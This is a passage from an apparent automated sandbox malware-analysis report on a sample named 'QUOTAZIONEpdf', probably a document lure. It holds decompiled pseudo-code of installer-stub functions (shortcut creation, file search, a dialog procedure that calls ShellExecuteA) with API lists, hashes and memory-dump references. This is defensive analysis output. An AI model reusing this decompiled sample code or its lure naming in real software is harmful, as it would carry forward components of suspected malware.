                • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                0x0040201b
                0x00402025
                0x0040202e
                0x00402038
                0x00402041
                0x0040204b
                0x0040204f
                0x0040204f
                0x00402054
                0x00402065
                0x0040206d
                0x0040214d
                0x0040214d
                0x00402154
                0x00402073
                0x00402073
                0x00402084
                0x00402088
                0x0040208e
                0x00402098
                0x0040209a
                0x004020a5
                0x004020a8
                0x004020b5
                0x004020b7
                0x004020b9
                0x004020c0
                0x004020c3
                0x004020c3
                0x004020c6
                0x004020d0
                0x004020d8
                0x004020dd
                0x004020e9
                0x004020e9
                0x004020ec
                0x004020f5
                0x004020f8
                0x00402101
                0x00402106
                0x00402118
                0x00402127
                0x00402129
                0x00402135
                0x00402135
                0x00402127
                0x00402137
                0x0040213d
                0x0040213d
                0x00402140
                0x00402146
                0x0040214b
                0x00402160
                0x00000000
                0x00000000
                0x00000000
                0x0040214b
                0x00402156
                0x00402880
                0x0040288c

                APIs
                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 123533781-501415292
                • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                Download Yara Rule
                C-Code - Quality: 39%
                			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                0x00402648
                0x0040265c
                0x00402667
                0x00402668
                0x004027a3
                0x0040264a
                0x0040264a
                0x0040264c
                0x0040264e
                0x0040264e
                0x00402880
                0x0040288c

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019E79A, Relevance: .2, Instructions: 196COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.300558298.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_19e000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                • Instruction ID: 0cfbd2ca563697613a7fe2fe38b15c3e001744581332323c71f4f0f07fee946a
                • Opcode Fuzzy Hash: 195a289bea6c427d6dd0e94af631ce1939ca6bc38f5db606016c202de45f5cbb
                • Instruction Fuzzy Hash: 95619C71E00608ABCF20DFA4C884BAEBBF5EF58710F248059E946EB394EB749D01CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019E9AE, Relevance: .1, Instructions: 61COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.300558298.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_19e000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                • Instruction ID: 9e2e78872f6f5f5b42c58e8c8eb2385bf7d25e69904b06378071410244b52bef
                • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                • Instruction Fuzzy Hash: 8911A031A10119AFCF20DBA9C8888AEF7FEFF55794B5400A9F805D3224E770EE40C660
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019EA9E, Relevance: .0, Instructions: 26COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.300558298.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_19e000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                • Instruction ID: 10e10911ba60c2acb35ffb165e87d3d24926384f34ef628440fb647fc8a2544b
                • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                • Instruction Fuzzy Hash: E0E09A357606499FCB14CBA8C881D29B3F8EB08330B1042A0FC16C73A0EB34FE00DA50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019EADC, Relevance: .0, Instructions: 23COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.300558298.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_19e000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                • Instruction ID: e6dd06fd2b942adf321a1819b3620931d83bc039077b72cf0817037a9bd77980
                • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                • Instruction Fuzzy Hash: AAE08C363115608BCB60DA59C484D52F3E8FF883B171A486AE84BD3721C330FC00C650
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019EA5F, Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.300558298.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_19e000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403964, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                0x0040396d
                0x00403976
                0x00403ab7
                0x00403abb
                0x00403abf
                0x00403ac1
                0x00403ac6
                0x00403ad1
                0x00403adc
                0x00403ae1
                0x00403ae3
                0x00403ae5
                0x00403ae8
                0x00403aed
                0x00403afb
                0x00403b08
                0x00403b0f
                0x00403b0f
                0x00403b10
                0x00403b10
                0x00403b15
                0x00403b1b
                0x00403b22
                0x00403b28
                0x00403b2a
                0x00403b6a
                0x00403b6f
                0x00403b74
                0x00403b74
                0x00403b79
                0x00403b82
                0x00403b84
                0x00403b89
                0x00403b8f
                0x00403b93
                0x00403b93
                0x00403b98
                0x00403b9e
                0x00000000
                0x00000000
                0x00403ba9
                0x00403baf
                0x00000000
                0x00000000
                0x00403bb8
                0x00403bc0
                0x00403bc5
                0x00403bc8
                0x00403bce
                0x00403bd3
                0x00403bd6
                0x00403bdc
                0x00403be1
                0x00403be4
                0x00403bea
                0x00403bf2
                0x00403bf8
                0x00403bfe
                0x00403c02
                0x00403c09
                0x00403c09
                0x00403c09
                0x00403c13
                0x00403c25
                0x00403c31
                0x00403c36
                0x00403c40
                0x00403c46
                0x00403c48
                0x00403c4d
                0x00403c4a
                0x00403c4a
                0x00403c4a
                0x00403c5d
                0x00403c75
                0x00403c77
                0x00403c7d
                0x00403c92
                0x00403c7f
                0x00403c88
                0x00403c8a
                0x00403c8a
                0x00403c98
                0x00403ca8
                0x00403cb9
                0x00403cc0
                0x00403cc6
                0x00403cca
                0x00403ccf
                0x00403cd1
                0x00000000
                0x00403cd7
                0x00403cd7
                0x00403cd9
                0x00000000
                0x00000000
                0x00403cdf
                0x00403ce3
                0x00403d08
                0x00403d0e
                0x00403d14
                0x00403d16
                0x00000000
                0x00000000
                0x00403d3c
                0x00403d42
                0x00403d44
                0x00403d49
                0x00000000
                0x00000000
                0x00403d4f
                0x00403d52
                0x00403d55
                0x00403d6c
                0x00403d78
                0x00403d91
                0x00403d97
                0x00403d9b
                0x00403da0
                0x00403da6
                0x00000000
                0x00000000
                0x00403db0
                0x00403dbb
                0x00000000
                0x00403dbb
                0x00403ce5
                0x00403ceb
                0x00000000
                0x00000000
                0x00403cf1
                0x00403cf7
                0x00000000
                0x00000000
                0x00000000
                0x00403cfd
                0x00403cd1
                0x00403dc8
                0x00403dd4
                0x00403ddb
                0x00000000
                0x00403b2c
                0x00403b2c
                0x00403b2f
                0x00403b62
                0x00403b62
                0x00403b64
                0x00000000
                0x00000000
                0x00000000
                0x00403b64
                0x00403b31
                0x00403b35
                0x00403b3a
                0x00403b3c
                0x00000000
                0x00000000
                0x00403b4c
                0x00403b54
                0x00000000
                0x00403b5a
                0x00403988
                0x00403988
                0x0040398c
                0x00403991
                0x004039a0
                0x004039a0
                0x004039a9
                0x004039b2
                0x004039bd
                0x004039bd
                0x004039c9
                0x004039e5
                0x004039e8
                0x004039fb
                0x00403a01
                0x00403aa4
                0x00000000
                0x00403aad
                0x00403a07
                0x00403a14
                0x00403a16
                0x00403a18
                0x00403a37
                0x00403a37
                0x00403a3a
                0x00403a3f
                0x00403a42
                0x00403a52
                0x00403a53
                0x00403a55
                0x00403a8b
                0x00403a9e
                0x00000000
                0x00403a9e
                0x00403a57
                0x00403a5d
                0x00403a76
                0x00403a7b
                0x00403a7d
                0x00000000
                0x00000000
                0x00403a7f
                0x00403a6b
                0x00403a6b
                0x00403a6d
                0x00403a6d
                0x00000000
                0x00403a6d
                0x00403a60
                0x00403a65
                0x00000000
                0x00403a65
                0x00403a44
                0x00403a4a
                0x00000000
                0x00000000
                0x00403a4c
                0x00000000
                0x00403a4c
                0x00403a3c
                0x00000000
                0x00403a3c
                0x00403a22
                0x00403a29
                0x00403a2f
                0x00403a31
                0x00000000
                0x00000000
                0x00000000
                0x00403a31
                0x004039ed
                0x00000000
                0x004039cb
                0x004039d1
                0x004039db
                0x00403de1
                0x00403de7
                0x00403df4
                0x00403dfa
                0x00403dfa
                0x00403e04
                0x00000000
                0x00403e04
                0x004039c9

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                • ShowWindow.USER32(?), ref: 004039BD
                • DestroyWindow.USER32 ref: 004039D1
                • SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
                • GetDlgItem.USER32 ref: 00403A0E
                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                • IsWindowEnabled.USER32(00000000), ref: 00403A29
                • GetDlgItem.USER32 ref: 00403AD7
                • GetDlgItem.USER32 ref: 00403AE1
                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                • GetDlgItem.USER32 ref: 00403BF2
                • ShowWindow.USER32(00000000,?), ref: 00403C13
                • EnableWindow.USER32(?,?), ref: 00403C25
                • EnableWindow.USER32(?,?), ref: 00403C40
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                • EnableMenuItem.USER32 ref: 00403C5D
                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 184305955-0
                • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403F7F, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
